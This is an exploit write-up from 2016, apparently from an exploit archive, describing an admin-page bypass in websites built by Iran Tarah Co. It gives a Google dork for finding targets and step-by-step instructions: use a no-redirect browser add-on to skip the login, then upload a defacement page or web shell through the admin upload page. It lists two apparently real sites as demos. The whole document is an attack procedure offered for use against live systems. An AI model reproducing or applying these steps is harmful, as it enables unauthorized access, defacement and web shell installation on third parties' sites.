|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[+] Exploit Title: Admin Page Bypass [ Iran Tarah® Co.] Upload Index
|[+]
|[+] Exploit Author: 1337r00t - T34m D4rkn3ss R00m Fr0m Saudi Arabia
|[+]
|[+] Vendor Homepage: http://www.irantarah.com/
|[+]
|[+] Google Dork: inurl:/admin/ " تمامی حقوق مادی و معنوی وب سایت متعلق به شرکت ایران طراح (داده گستر اقلیما ) می باشد .
|[+]
|[+] Tested on: Windows 10 , Mozilla Firefox
|[+]
|[+] Date: 12/3/2016
|[+]
|--------------------------------------------------------------|
|[+] Exploit :
|[+]
|[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox
|[+]
|[+]
|[+] Admin Url :-
|[+] http://[$host]/admin/login.php
|[+]
|[+]
|[+]
|[+] 1- Run Tool NoRedirect
|[+] 2- Add Site New
|[+] 3- Add: ^[$site]/admin/login.php
|[+] 4- Path Upload The Site : [$site]/admin/Upload.php
|[+] 5- Upload Index Or Shell
|[+]
|--------------------------------------------------------------|
|[+] Demo:-
|[+]
|[+] www.namisteelco.com/admin/login.php
|[+] www.jsba.ir/admin/login.php
|[+]
|--------------------------------------------------------------|
|[+] My Accounts :-
|[+]
|[+] Twitter:1337r00t
|[+] Instagram: 1337r00t
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : 1337r00t
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|